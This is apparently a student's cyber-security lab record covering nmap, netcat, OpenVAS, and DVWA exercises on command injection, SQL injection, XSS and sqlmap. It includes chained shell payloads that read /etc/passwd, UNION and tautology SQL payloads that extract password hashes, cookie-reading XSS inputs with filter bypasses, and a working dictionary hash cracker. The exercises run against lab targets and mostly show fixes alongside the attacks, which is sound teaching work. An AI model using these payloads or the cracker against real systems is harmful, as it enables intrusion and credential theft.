Practical- 2
NMAP is short for Network Mapper. It is an open source security tool for network
exploration, security scanning and auditing. The nmap command comes with a large
number of options, which make the utility very flexible but hard to follow for new
users.
The purpose of this practical is to introduce the nmap command line tool for scanning
a host and/or network in order to find possible vulnerable points on the hosts.
You will also learn how to use Nmap for offensive and defensive purposes.
## Scan several hosts at once (comma-separated last octets) ##
nmap 192.168.1.1,2,3
1|Page
CYBER SECURITY (2150002) Er.No.: 161120105045
Sample outputs: (screenshot not reproduced)
Other forms of target specification accepted by nmap (these are targets, not output):
server1.cyberciti.biz (a hostname)
192.168.1.0/24 (a whole subnet in CIDR notation)
192.168.1.1/24 (the same subnet; nmap applies the /24 mask to the address given)
10.1.2.3 (a single IPv4 address)
localhost
Nmap uses raw IP packets in novel ways to determine what hosts are available on
the network, what services (application name and version) those hosts are offering,
what operating systems (and OS versions) they are running, what type of packet
filters/firewalls are in use, and dozens of other characteristics.
It was designed to rapidly scan large networks, but works fine against single hosts.
Nmap runs on all major computer operating systems, and both console and
graphical versions are available.
Solution:
nmap -p [port] hostName
## Scan port 80 ##
nmap -p 80 192.168.1.1
## Scan TCP port 80 ##
nmap -p T:80 192.168.1.1
## Scan UDP port 53 ##
## (U: ports are only probed when a UDP scan is enabled with -sU, which needs root; see the combined form below) ##
nmap -p U:53 192.168.1.1
## Scan two ports ##
nmap -p 80,443 192.168.1.1
## Scan port ranges ##
nmap -p 80-200 192.168.1.1
## Combine all options ##
## (a T: or U: prefix applies to every port that follows it until the next prefix) ##
nmap -p U:53,111,137,T:21-25,80,139,8080 192.168.1.1
nmap -p U:53,111,137,T:21-25,80,139,8080 server1.cyberciti.biz
nmap -v -sU -sT -p U:53,111,137,T:21-25,80,139,8080 192.168.1.254
## Scan all ports with * wildcard ##
nmap -p "*" 192.168.1.1
## Scan top ports, i.e. scan the $number most common ports ##
nmap --top-ports 5 192.168.1.1
nmap --top-ports 10 192.168.1.1
Sample outputs: (screenshots not reproduced)
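The combined -p forms above are easy to misread, so here is a small parser for nmap's port specification syntax, added to this record as a worked example (it is not nmap's code). It implements the rules stated in the nmap manual: a T: or U: letter applies to every item after it until another letter appears, items before any letter are scanned with every protocol requested, and "*" is taken to mean 1-65535 (an assumption, matching the -p- form).

```python
import re

# Added example for this lab record, not part of nmap. Parses the -p argument
# exactly as the command lines above use it.
PORT_ITEM = re.compile(r"(?:([TU]):)?(\*|\d+(?:-\d+)?)$")


def parse_port_spec(spec, scanned=("T",)):
    """Return {"T": set_of_ports, "U": set_of_ports} for an nmap -p string.

    `scanned` lists the protocols the scan will use, e.g. ("T", "U") for
    -sT -sU; ports given without a letter are assigned to all of them.
    """
    ports = {"T": set(), "U": set()}
    current = None  # protocol letter in force; None until one has been seen
    for item in spec.split(","):
        item = item.strip()
        if not item:
            raise ValueError("empty item in port specification")
        match = PORT_ITEM.match(item)
        if match is None:
            raise ValueError(f"bad port item: {item!r}")
        letter, numbers = match.groups()
        if letter is not None:
            current = letter  # sticks until the next T:/U:
        if numbers == "*":
            rng = range(1, 65536)  # assumption: "*" behaves like -p-
        elif "-" in numbers:
            lo, hi = (int(x) for x in numbers.split("-"))
            if lo > hi:
                raise ValueError(f"reversed range: {numbers}")
            rng = range(lo, hi + 1)
        else:
            rng = range(int(numbers), int(numbers) + 1)
        if rng[-1] > 65535:
            raise ValueError(f"port out of range: {numbers}")
        for proto in ([current] if current else scanned):
            ports[proto].update(rng)
    return ports


def port_count(spec, scanned=("T",)):
    """Total number of (protocol, port) probes the specification expands to."""
    return sum(len(v) for v in parse_port_spec(spec, scanned).values())


if __name__ == "__main__":
    for spec in ("80", "80,443", "80-200", "U:53,111,137,T:21-25,80,139,8080"):
        parsed = parse_port_spec(spec, ("T", "U"))
        print(spec, "->", {k: sorted(v) for k, v in parsed.items()})
```

Running it on the combined specification shows 53, 111 and 137 landing in the UDP set and 21-25, 80, 139 and 8080 in the TCP set, which is why the third combined command line needs both -sU and -sT to probe everything listed.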
Practical:3
Aim: TCP / UDP connectivity using Netcat
What is Netcat?
nc, also known as the TCP/IP Swiss army knife, is a feature-rich network utility
which can be used to read and write data over network connections using TCP or
UDP.
What is port scanning?
Port scanning probes a host to discover which TCP or UDP ports have a service
listening. Open a new terminal (CTRL+ALT+T in Ubuntu) and run the following command
to perform a TCP port scan of port 25 on the local host (-v reports the result, -z
connects and closes without sending any data):
nc -v -z 127.0.0.1 25
To scan several ports at once, give a range; add -u to probe UDP instead of TCP (a
UDP port is reported open merely because no ICMP "port unreachable" came back, so
UDP results are far less reliable than TCP ones):
nc -v -z host port-range
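What nc -z does for each port is a plain TCP connect() followed by an immediate close. The following example, added to this record and not part of netcat, reproduces that for a port range, and starts a constructed local listener on an ephemeral port so the scan has a known-open port to find without touching any external host.

```python
import socket
import threading
from contextlib import closing

# Added example for this lab record, not netcat's code: a TCP connect scan doing
# what `nc -v -z host port-range` does, plus a constructed target to scan.


def start_listener(host="127.0.0.1"):
    """Constructed target service on an ephemeral port. Returns (port, stop_function)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)
    srv.settimeout(0.2)
    stopping = threading.Event()

    def serve():
        while not stopping.is_set():
            try:
                conn, _ = srv.accept()
                conn.close()  # accept then hang up, like any service answering a -z probe
            except socket.timeout:
                continue
            except OSError:
                break

    worker = threading.Thread(target=serve, daemon=True)
    worker.start()
    port = srv.getsockname()[1]

    def stop():
        stopping.set()
        srv.close()
        worker.join(timeout=1)

    return port, stop


def tcp_port_open(host, port, timeout=0.5):
    """nc -z equivalent: a TCP connect() that succeeds means something is listening."""
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0


def scan_range(host, first, last, timeout=0.5):
    """Return the open ports in [first, last], in the order nc would report them."""
    return [p for p in range(first, last + 1) if tcp_port_open(host, p, timeout)]


def demo():
    """Start the constructed listener, scan around its port, return (port, open_ports)."""
    port, stop = start_listener()
    try:
        return port, scan_range("127.0.0.1", max(1, port - 2), port + 2)
    finally:
        stop()


if __name__ == "__main__":
    listening, found = demo()
    for p in found:
        print(f"Connection to 127.0.0.1 {p} port [tcp/*] succeeded!")
    print("constructed listener was on port", listening)
```

The connect scan is noisy: every probe completes the TCP handshake, so the target's service logs a connection from the scanner. That is the trade-off against nmap's default SYN scan, which needs raw sockets (root) but never completes the handshake.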
Practical:4
Aim: Network Vulnerability using OpenVAS
In this exercise we will show a popular open source vulnerability scanner called
OpenVAS (Open Vulnerability Assessment System). OpenVAS is a fork of the Nessus
scanner, made when Nessus became a proprietary tool. The actual security scanner is
accompanied with a daily updated feed of Network Vulnerability Tests (NVTs), over
20,000 in total (as of January 2011).
Notes:
Commands preceded with "$" imply that you should execute the command as a
general user, not as root.
Commands preceded with "#" imply that you should be working as root.
Commands with more specific prompts (e.g. "RTR-GW>" or "mysql>") imply
that you are executing commands on remote equipment, or within another program.
Installation
$ sudo openvas-nvt-sync
Ideally, you will want to only allow scanning of hosts that are under your control.
When openvas-adduser prompts for the user's rules, restrict this user to the lab
network; to understand the rule syntax, check the openvas-adduser man page. Type
accept 10.10.0.0/16
default deny
Operation
The server has to load thousands of vulnerability checks, which takes VERY
LONG, especially on a machine that is not very powerful. Most likely, you will not
be able to run this on the virtual NSRC lab.
On a production setup, you will need a machine with multiple processors/cores and
quite a bit of RAM, especially if you will be scanning many hosts.
Running a scan
$ cd /home/sysadm
$ vi scanme.txt
10.10.0.250
10.10.2.5
$ man openvas-client
You might have to transfer that file to your laptop so that you can open it with a
browser.
You could take advantage of version control systems like Subversion or Git
to keep track of changes in the hosts you scan.
Add a cron job to scan hosts periodically (e.g. once a month), using the -T txt or
-T xml report format so that successive reports can be compared.
Practical-5
AIM: Web application testing using DVWA
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn
vulnerable.
Its main goals are to be an aid for security professionals to test their skills and tools in a
legal environment, help web developers better understand the processes of securing web
applications and aid teachers/students to teach/learn web application security in a class
room environment.
The purpose of the command injection attack is to inject and execute commands specified
by the attacker in the vulnerable application.
In situations like this, the application, which executes unwanted system commands,
acts as a pseudo system shell, and the attacker may use it as an authorized system
user.
Note that the commands are executed with the same privileges as the application
and/or web server.
Command injection attacks are possible in most cases because of lack of correct input
data validation, which can be manipulated by the attacker (forms, cookies, HTTP headers
etc.).
Instructions:
1. On your host computer, go to:
2. Start --> All Programs --> VMWare --> VMWare Player
Instructions:
1. Highlight fedora14
2. Click Edit virtual machine settings
3. Under the network adapter settings, select Bridged
Instructions:
1. Start Up VMWare Player
2. Select Fedora14
3. Play virtual machine
2. Login to Fedora14
Instructions:
1. Login: student
2. Password: <whatever you set it to>.
Instructions:
1. Applications --> Terminal
Instructions:
1. su - root
2. <Whatever you set the root password to>
3 Get IP Address
Instructions:
1. ifconfig -a
Notes:
o As indicated below, my IP address is 192.168.1.106.
o Please record your IP address.
Instructions:
1. Applications --> Internet --> Firefox
Notes:
o You can open a web browser on any operating system on your network.
o Working with DVWA does not have to be done on the Fedora machine; the only
requirements are as follows:
1. The Fedora server is on the network.
2. httpd is running.
3. mysqld is running.
Instructions:
1. http://192.168.1.106/dvwa/login.php
Replace 192.168.1.106 with the IP Address obtained from Section 3, Step
3.
2. Username: admin
3. Password: password
"password" is the default password for user admin.
Instructions:
1. Click on DVWA Security
Instructions:
1. Select Low
2. Click Submit
1 Command Execution
Instructions:
1. Click on Command Execution
2 Execute Ping
Notes:
o Below we are going to do a simple ping test using the web interface.
o As an example, ping something on your network.
o Use the IP address obtained in Section 3, Step 3 if you have nothing else to ping.
Instructions:
1. 192.168.1.106
2. Click Submit
Instructions:
1. cat /etc/passwd
2. Click Submit
Notes:
o Notice that either a message saying illegal IP address was displayed or nothing
was returned.
Instructions:
1. 192.168.1.106; cat /etc/passwd
2. Click Submit
Notes:
o Notice that we are now able to see the contents of the /etc/passwd file.
Instructions:
1. Bring up a terminal window (see Section 3, Step 1 if you don't know how)
2. cat /var/www/html/dvwa/vulnerabilities/exec/source/low.php
Notes:
1. Notice the two shell_exec lines.
2. These are the lines that execute ping, depending on which operating system is
being used.
3. In a Unix/Linux shell, you can run multiple commands separated by ";".
4. Notice that the code does not check that $target matches an IP address pattern
such as \d+\.\d+\.\d+\.\d+, where "\d+" represents one or more digits, as in
192.168.1.106. Even that pattern would have to be anchored with ^ and $, otherwise
text appended after a valid address would still pass.
5. The code allows an attacker to append commands behind the IP address.
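The low.php shell_exec lines paste the form field straight into a shell command string. The example below, added to this record and not DVWA's own code, reproduces that behaviour in Python next to the fix a practitioner would apply: validate the field as exactly one IPv4 address and pass it as a separate argv element so no shell ever parses it. The ping command is replaced by echo so the demo runs offline; the assumption is a POSIX /bin/sh, which is what shell=True uses.

```python
import ipaddress
import subprocess

# Added example for this lab record, not DVWA's code. Compares the DVWA-low way of
# running ping (field concatenated into a shell string, as the low.php shell_exec()
# lines do) with a validated, shell-free version. "echo" stands in for "ping -c 3".

BASE_COMMAND = "echo pinging"  # stand-in for "ping -c 3"; assumes POSIX /bin/sh


def vulnerable_run(target):
    """DVWA-low style: the raw field becomes part of a shell command line."""
    cmd = f"{BASE_COMMAND} {target}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def validate_ipv4(target):
    """Allow-list check: the whole field must be exactly one IPv4 address."""
    try:
        return str(ipaddress.IPv4Address(target.strip()))
    except (ipaddress.AddressValueError, ValueError):
        raise ValueError(f"illegal IP address: {target!r}") from None


def safe_argv(target):
    """argv for the real command; with no shell involved, ';' and '|' are just bytes."""
    return ["ping", "-c", "3", validate_ipv4(target)]


def safe_run(target):
    """The same idea executed with the echo stand-in: argv list, shell=False."""
    return subprocess.run(["echo", "pinging", validate_ipv4(target)],
                          capture_output=True, text=True, check=True).stdout


def injection_succeeded(target, marker="INJECTED"):
    """True if a command chained onto the field actually ran (its marker shows up)."""
    return marker in vulnerable_run(target)


if __name__ == "__main__":
    payload = "192.168.1.106; echo INJECTED"
    print("vulnerable:", vulnerable_run(payload).strip().replace("\n", " | "))
    try:
        safe_run(payload)
    except ValueError as err:
        print("safe:", err)
```

Note that ipaddress.IPv4Address rejects anything that is not a bare dotted quad, so hostnames are refused too; if the page must accept names, validate them against a hostname grammar and still pass the result as an argv element rather than through a shell.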
Instructions:
1. 192.168.1.106; cat /etc/passwd | tee /tmp/passwd
Note:
o Here we are not only displaying the contents of /etc/passwd on the webpage, but
also we are copying the /etc/passwd file to the /tmp directory.
1 Proof of Lab
Instructions:
1. Bring up a terminal window
2. cd /tmp
3. ls -l passwd
4. date
5. echo "Your Name"
Replace the string "Your Name" with your actual name.
e.g., echo "John Gray"
Proof of Lab Instructions:
1. Do a <PrtScn>
2. Paste into a word document
3. Upload to Moodle
Practical-6
AIM: SQL INJECTION USING DVWA
SQL injection is considered a high-risk vulnerability because it can lead to full
compromise of the remote system. This is why in almost all web application penetration
testing engagements the applications are checked for SQL injection flaws. A simple
working definition: an application is vulnerable to SQL injection when input it accepts
from the user is placed into a database query in a way that lets the user change the
structure of the query, not just the value it compares against.
DVWA
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
Its main goals are to be an aid for security professionals to test their skills and tools in a legal
environment, help web developers better understand the processes of securing web applications
and aid teachers/students to teach/learn web application security in a class room environment
SQL Injection
SQL injection is a technique often used to attack data-driven applications.
This is done by including portions of SQL statements in an entry field in an attempt to get the
website to pass a newly formed rogue SQL command to the database (e.g., to dump the database
contents to the attacker). SQL injection is a code injection technique that exploits a security
vulnerability in an application's software.
The vulnerability happens when user input is either incorrectly filtered for string literal escape
characters embedded in SQL statements or user input is not strongly typed and unexpectedly
executed. SQL injection is mostly known as an attack vector for websites but can be used to
attack any type of SQL database.
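To make the two paragraphs above concrete, here is an added example (not DVWA's code) with the shape of the query behind DVWA's SQL Injection page: the id from the form is spliced into a quoted string. It runs against an in-memory SQLite table constructed to look like a DVWA users table, with md5 hashes computed in the script rather than copied from anywhere, and shows both the tautology payload that returns every row and a UNION payload that pulls user names and password hashes out of the same form field. The parameterised version sits beside it. SQLite is used because it ships with Python; the same payloads work against MySQL, except that the comment marker differs.

```python
import hashlib
import sqlite3

# Added example for this lab record, not DVWA's code. Data below is constructed.


def md5(s):
    return hashlib.md5(s.encode()).hexdigest()


SAMPLE_USERS = [  # constructed: (user_id, first_name, last_name, user, password)
    (1, "admin", "admin", "admin", md5("password")),
    (2, "Gordon", "Brown", "gordonb", md5("abc123")),
    (3, "Hack", "Me", "1337", md5("charley")),
    (4, "Pablo", "Picasso", "pablo", md5("letmein")),
    (5, "Bob", "Smith", "smithy", md5("password")),
]


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, "
                 "last_name TEXT, user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_lookup(conn, user_id):
    """String concatenation: whatever the user typed is parsed as SQL."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def safe_lookup(conn, user_id):
    """Parameterised query: the value is bound, never parsed as SQL."""
    return conn.execute("SELECT first_name, last_name FROM users WHERE user_id = ?",
                        (user_id,)).fetchall()


# Classic payloads. The trailing "-- " comments out the closing quote the
# application appends (DVWA write-ups use '#', which MySQL accepts but SQLite does not).
TAUTOLOGY = "' OR '1'='1"
UNION_DUMP = "' UNION SELECT user, password FROM users -- "


if __name__ == "__main__":
    db = build_db()
    print("normal:     ", vulnerable_lookup(db, "1"))
    print("tautology:  ", vulnerable_lookup(db, TAUTOLOGY))
    print("union dump: ", vulnerable_lookup(db, UNION_DUMP))
    print("safe, same payload:", safe_lookup(db, UNION_DUMP))
```

The UNION payload works because the page always prints two columns, so any two-column SELECT the attacker appends is rendered in the same place; that is also why the first step of a manual test is usually working out the column count with ORDER BY n.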
PROCESS
Install XAMPP
Copy DVWA-1.0.8 into the XAMPP htdocs folder
Start XAMPP program
Start APACHE and MYSQL module by clicking on start.
Start Firefox
Type http://127.0.0.1/DVWA-1.0.8/login.php
Login: admin
Password: password
Click on Login
Click Submit
Practical-7
Aim: XSS using DVWA
What is Damn Vulnerable Web App (DVWA)?
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
Its main goals are to be an aid for security professionals to test their skills and tools in a legal
environment, help web developers better understand the processes of securing web applications
and aid teachers/students to teach/learn web application security in a class room environment.
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web
applications.
XSS enables attackers to inject client-side script into Web pages viewed by other users.
A cross-site scripting vulnerability may be used by attackers to bypass access controls such as
the same-origin policy. In addition, the attacker can send input (e.g., username, password, session
ID, etc.) which can later be captured by an external script. The victim's browser has no way to
know that the script should not be trusted, and will execute it. Because it thinks the script
came from a trusted source, the malicious script can access any cookies, session tokens, or other
sensitive information retained by the browser and used with that site.
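The following added example (not DVWA's code) shows three ways a page can echo the "name" parameter of DVWA's reflected XSS exercise: raw, as the low level does; through a single-string blacklist that strips the literal "<script>" tag, which is the kind of filter its medium level uses (an assumption about the exact filter); and with proper HTML output encoding. A small regular-expression check stands in for the browser and only answers whether the reflected page contains something a browser would execute.

```python
import html
import re

# Added example for this lab record, not DVWA's code. Payloads are constructed.


def render_raw(name):
    return f"<pre>Hello {name}</pre>"


def render_blacklist(name):
    # removes only the literal lowercase "<script>" tag, nothing else
    return f"<pre>Hello {name.replace('<script>', '')}</pre>"


def render_encoded(name):
    # html.escape turns < > & " ' into entities, so the browser shows them as text
    return f"<pre>Hello {html.escape(name, quote=True)}</pre>"


# Crude stand-in for a browser: would anything in this page run as script?
_SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)
_EVENT_HANDLER = re.compile(r"<[^>]*\son\w+\s*=", re.IGNORECASE)


def would_execute(page):
    return bool(_SCRIPT_TAG.search(page) or _EVENT_HANDLER.search(page))


PAYLOADS = {  # constructed test inputs
    "plain": "<script>alert(document.cookie)</script>",
    "mixed_case": "<ScRiPt>alert(document.cookie)</ScRiPt>",
    "event_handler": '<img src=x onerror="alert(document.cookie)">',
}


def evaluate(renderers=(render_raw, render_blacklist, render_encoded)):
    """Map renderer name -> {payload name: True if the reflected page would run script}."""
    return {r.__name__: {k: would_execute(r(v)) for k, v in PAYLOADS.items()}
            for r in renderers}


if __name__ == "__main__":
    for renderer, outcome in evaluate().items():
        print(renderer, outcome)
```

The blacklist stops only the first payload: changing the tag's case or using an element with an event handler walks straight past it, which is why output encoding at the point where untrusted data meets HTML is the fix, not input filtering.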
Step 1: (screenshot not reproduced)
Step 3: (screenshot not reproduced)
Step 5: Result (screenshot not reproduced)
Practical-8
Aim : Automated SQL injection with SqlMap
sqlmap is an open source penetration testing tool that automates the process of detecting and
exploiting SQL injection flaws and taking over database servers. It comes with a powerful
detection engine, many niche features for the ultimate penetration tester and a broad range of
switches ranging from database fingerprinting, over data fetching from the database, to accessing
the underlying file system and executing commands on the operating system via out-of-band
connections.
Features
-Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access,
IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB database management
systems.
-Full support for six SQL injection techniques: boolean-based blind, time-based blind,
error-based, UNION query-based, stacked queries and out-of-band.
-Support to directly connect to the database without passing via a SQL injection, by providing
DBMS credentials, IP address, port and database name.
-Support to enumerate users, password hashes, privileges, roles, databases, tables and
columns.
-Automatic recognition of password hash formats and support for cracking them using a
dictionary-based attack.
-Support to dump database tables entirely, a range of entries or specific columns as per user's
choice. The user can also choose to dump only a range of characters from each column's entry.
-Support to search for specific database names, specific tables across all databases or
specific columns across all databases' tables. This is useful, for instance, to identify tables
containing custom application credentials where relevant columns' names contain strings like
name and pass.
-Support to download and upload any file from the database server underlying file system
when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
-Support to execute arbitrary commands and retrieve their standard output on the database
server underlying operating system when the database software is MySQL, PostgreSQL or
Microsoft SQL Server.
Download
Now it's time to move on to sqlmap to attack such URLs. The sqlmap command is run from the
terminal with the Python interpreter.
The first and simplest command (passing the target URL with the -u option; the screenshot of
the command is not reproduced) checks the input parameters to find whether they are vulnerable
to SQL injection or not. For this, sqlmap sends different kinds of SQL injection payloads to the
input parameter and checks the output. In the process sqlmap is also able to identify the remote
operating system, database name and version. Here is how the output might look:
So the sqlmap tool has discovered the operating system, web server and database along with
version information. Even this much is pretty impressive, but it's time to move on and see what
more this tool is capable of.
Discover Databases
Once sqlmap confirms that a remote url is vulnerable to sql injection and is exploitable the next
step is to find out the names of the databases that exist on the remote system. The "--dbs" option
is used to get the database list.
Command:
(screenshot of the command and its output not reproduced)
Isn't this amazing? It is, of course. Let's get the columns of a particular table now (the
--columns option, scoped to a database and table with -D and -T).
(screenshots not reproduced)
The above command (--dump) will simply dump the data of the particular table, very much like the
mysqldump command.
The output might look similar to this:
(dumped table not reproduced: an id column, a name column and a hash column, among others)
The hash column holds the password hash. Try cracking the hash and you would get the login
details right away. sqlmap also writes a CSV file containing the dumped data for easy
analysis.
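The two steps sqlmap automates at this point, recognising the hash format in the dumped column and running a dictionary attack against it, are small enough to show in full. The example below is added to this record and is not sqlmap's code; the dumped rows and the wordlist are constructed for the demo, and the digests are computed in the script rather than copied from a scan.

```python
import hashlib
import re

# Added example for this lab record, not sqlmap's code.

# Unsalted formats recognised by hex length. Length alone is ambiguous (NTLM is also
# 32 hex characters), which is why sqlmap also looks at the column name and the DBMS.
HEX_LENGTH_TO_ALGO = {32: "md5", 40: "sha1", 64: "sha256"}


def identify_hash(value):
    """Guess the digest algorithm from a hex string, or None if it is not a bare hex digest."""
    value = value.strip().lower()
    if not re.fullmatch(r"[0-9a-f]+", value):
        return None
    return HEX_LENGTH_TO_ALGO.get(len(value))


def crack_hash(value, wordlist):
    """Return the wordlist entry whose digest equals value, or None."""
    algo = identify_hash(value)
    if algo is None:
        return None
    target = value.strip().lower()
    for word in wordlist:
        if hashlib.new(algo, word.encode()).hexdigest() == target:
            return word
    return None


def crack_dump(rows, wordlist):
    """rows: (user, hash) pairs as dumped from a users table -> {user: password or None}."""
    return {user: crack_hash(digest, wordlist) for user, digest in rows}


def digest_of(algo, text):
    return hashlib.new(algo, text.encode()).hexdigest()


DUMP = [  # constructed, in the shape of the dumped table above
    ("admin", digest_of("md5", "password")),
    ("gordonb", digest_of("md5", "abc123")),
    ("pablo", digest_of("sha1", "letmein")),
    ("smithy", "not-a-hash-at-all"),
    ("1337", digest_of("sha256", "charley")),
]
WORDLIST = ["123456", "password", "letmein", "abc123", "qwerty"]  # constructed


if __name__ == "__main__":
    for user, password in crack_dump(DUMP, WORDLIST).items():
        print(f"{user}: {password if password else '(not cracked)'}")
```

A dump of unsalted MD5 or SHA-1 values falls to a wordlist in seconds, which is the point the text is making about the hash column; an application that stored salted, slow hashes (bcrypt, scrypt, Argon2) would turn the same dump into a far less useful haul.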
So far we have been able to collect a lot of information from the remote database using sqlmap.
It's almost like having direct access to the remote database through a client like phpMyAdmin. In
real scenarios attackers would try to gain a higher level of access to the system. For this, they
would try to crack the password hashes and log in through the admin panel, or they would try to
get an OS shell using sqlmap.